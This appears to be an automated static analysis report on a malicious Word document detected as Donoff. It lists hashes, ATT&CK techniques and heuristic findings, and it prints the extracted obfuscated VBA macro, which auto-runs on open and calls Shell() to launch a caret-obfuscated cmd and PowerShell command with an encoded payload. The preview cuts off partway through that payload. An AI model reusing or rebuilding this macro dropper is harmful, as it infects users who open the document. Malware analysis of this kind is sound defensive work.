Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 d4839df61767bb98…

MALICIOUS

Office (OLE)

Size: 114.0 KB | Created: 2018-06-06 13:32:00 | Authoring application: Microsoft Office Word | First seen: 2018-06-21
MD5: ef98e92e828c270f91ecc2dced3fd7e6
SHA-1: e7389a7dddec0fe8ff631761a0588e9f5fbfce74
SHA-256: d4839df61767bb98251f72f783f7d0b3270ed942e978f36b7f7f94d2a4fda876
Risk score: 242

Malware Insights

MITRE ATT&CK
  • T1059.005 Command and Scripting Interpreter: Visual Basic
  • T1059 Command and Scripting Interpreter
  • T1204.002 User Execution: Malicious File

The sample is a malicious Office document containing a VBA macro with an AutoOpen function. This macro calls the Shell() function, which is used to execute a command. The reconstructed command string 'md ipJNOwDDK RKjQkjWTVqOwqPvNfhPVWDwJ & %^c^o^m^S^p^E^c^% %^c^' suggests an attempt to download and execute a second-stage payload, likely a downloader or dropper. The presence of the Shell() call and the AutoOpen execution token strongly indicate malicious intent.

Heuristics 7

  • ClamAV: Doc.Malware.Donoff-7111879-0 (critical, CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Donoff-7111879-0
  • VBA macros detected (medium, 3 related findings, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Shell() call in VBA (critical, OLE_VBA_SHELL)
    Shell() call in VBA
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (channel: in document text, OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 14184 bytes
SHA-256: b2b769392c35a5a95b527bf86f9a1af1a3aad5e836f1414e75a9fc6a5cca4c4d

Preview of the extracted script (first 1,000 lines):
Attribute VB_Name = "ZOODzDvdiUtNfz"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function TriuhBMCU()
On Error Resume Next
GfDsO = CStr(TitmT * Tan(DiYlL * Int(FGiXc * Sqr(27805) / zfoZRq + Fix(42103)) / 15996 * Round(18567 / Log(61169 - YcZpbw) + 58788 - oNIwi)) / 28648 + CByte(52207))
ADqjC = CStr(JQXfFc * Tan(zDuCiN * Int(mPifsR * Sqr(50444) / phGKq + Fix(53086)) / 41364 * Round(9735 / Log(37218 - mjSISw) + 88301 - OqJOv)) / 99431 + CByte(2447))
TriuhBMCU = atBIWfh + Shell(clSrP + Chr(ncnwwoSTau + vbKeyC + mzhkCX) + MMwpCbjG + dSswSX + tLhdu + fPBKSYi + fwXNbS + zEUiPmw + RvJDPcbd, 18446 - 18446)
dkYKql = CStr(nbpZu * Tan(UcwaFw * Int(Qdwhlq * Sqr(6088) / LalGIw + Fix(97275)) / 70235 * Round(61929 / Log(17228 - BUijd) + 45895 - PuOLnp)) / 6719 + CByte(44129))
End Function
Sub Autoopen()
On Error Resume Next
zorYAh = CStr(cBDSmo * Tan(rRRAu * Int(lwTJm * Sqr(51398) / VzmvC + Fix(72891)) / 43202 * Round(97883 / Log(92660 - kETpCf) + 49213 - MbYWt)) / 41794 + CByte(79707))
TriuhBMCU
NpDUh = CStr(ZZJcOH * Tan(ARWvd * Int(vbUjQt * Sqr(8649) / zkzFRG + Fix(88715)) / 47578 * Round(62438 / Log(91530 - HziujZ) + 33038 - pMJBa)) / 32115 + CByte(77601))
End Sub
Attribute VB_Name = "htGmbdLaoJWzBV"
Function MMwpCbjG()
On Error Resume Next
ZdvIrh = CStr(IBGUpd * Tan(MuVzM * Int(XaBha * Sqr(20895) / LAYkvS + Fix(29794)) / 71218 * Round(56266 / Log(98672 - VSLiP) + 92567 - mSisMT)) / 72433 + CByte(27746))
MBNjqptlt = "md " + "ipJNOwDDK RKjQ" + "kjWTVqOwqPvNf" + "nSZu zAPD" + "hPVWDwJ & " + "    %" + "^c^o^m^S^p" + "^E^c^%     %^c^"
DwcOh = CStr(BjHcVY * Tan(NXjuC * Int(uIpLFw * Sqr(77139) / zTnFzh + Fix(15077)) / 23436 * Round(73795 / Log(1306 - loQcam) + 51512 - OFLIR)) / 32600 + CByte(14135))
oqUIMaIqoit = "o^" + "m^S^p^E^c^%" + "     /V" + "       " + "  /c         " + "  set %nQRbUjA" + "TPw" + "BmzuI%=j"
BNmXR = CStr(oDPUWW * Tan(PBkiKQ * Int(djPYik * Sqr(49287) / mLWorN + Fix(11478)) / 97009 * Round(99010 / Log(56392 - rzNMG) + 31483 - UwDaa)) / 14668 + CByte(12))
DEqQipK = "YQsUWij" + "Q&&set %CFb" + "bTl" + "AVQc%=p&&" + "set %NhQizpO"
pVwOs = CStr(UBQEwh * Tan(iJClFq * Int(pQTII * Sqr(49585) / bjMkO + Fix(78348)) / 50613 * Round(45189 / Log(69656 - lklXww) + 16784 - iapoA)) / 78881 + CByte(39744))
XzYGMFjb = "Brj" + "IZE%=o^w&&s" + "et %VfpDzU" + "KAjbodmLD%=Gfi"
abZCp = CStr(TRtSD * Tan(jtDGZ * Int(zUECr * Sqr(38348) / AZzam + Fix(65762)) / 45376 * Round(31415 / Log(95515 - wwhKf) + 33244 - ifspY)) / 79739 + CByte(43243))
LGYtC = "wNPJYw&&set" + " %ORIKBzrpv" + "P%=!%CFbbTlAVQc" + "%!&&set %mwnEpQ" + "hiKwELPPc%=lTS" + "TpzMMaOrDm&&se" + "t %W" + "hiXwnAZuwT" + "jjD%=e^r&&set " + "%lYDkljitIBo"
OzpzLY = CStr(FsofTr * Tan(kjCli * Int(IssTD * Sqr(70194) / MbUck + Fix(55550)) / 82638 * Round(45072 / Log(69711 - QlpOtp) + 40955 - zdXvM)) / 74158 + CByte(74351))
dIADXlovcF = "JB%=!%NhQiz" + "pOBrjIZE%!" + "&&set %srS" + "ioGl%=s&" + "&set %CGWQHNW" + "WwqKHvbN%=GqQ" + "CF"
RaWFV = CStr(bAXiXM * Tan(qAjAzm * Int(pqPCX * Sqr(38072) / HAQOi + Fix(79724)) / 49806 * Round(22403 / Log(31732 - fNUKp) + 82637 - SIEGc)) / 76769 + CByte(90866))
tvkOBBdiCR = "cvqEGolbd&&set " + "%imLEWflu" + "%=he&&set %WfzD" + "SzTos" + "on%=ll&&" + "!%ORIKBzr" + "pvP%!!%lYD"
MMwpCbjG = MBNjqptlt + oqUIMaIqoit + DEqQipK + XzYGMFjb + LGYtC + dIADXlovcF + tvkOBBdiCR
End Function
Function dSswSX()
On Error Resume Next
AmVaL = CStr(hBpTz * Tan(PoXVf * Int(iUkRpz * Sqr(99016) / kPOzi + Fix(24744)) / 41345 * Round(241 / Log(65598 - EkFjz) + 22755 - qpjzdl)) / 68626 + CByte(52743))
TRWuBU = "kljitIBoJB%!!%" + "WhiXwnAZu" + "wTjjD%!!%sr" + "SioGl%!!%imLEWf" + "lu%!!%WfzDS"
FadizV = CStr(KjSmqp * Tan(lPGUQu * Int(CXYmwJ * Sqr(29977) / GdfYl + Fix(14897)) / 90860 * Round(42832 / Log(99016 - iJuwi) + 48543 - BDwkWQ)) / 36233 + CByte(63591))
VXRMS = "zToson%!  -e " + "IA" + "AoACA" + "ATgB" + "lAFcALQBPAE" + "IAagBlAEMAVAAgA
... (truncated)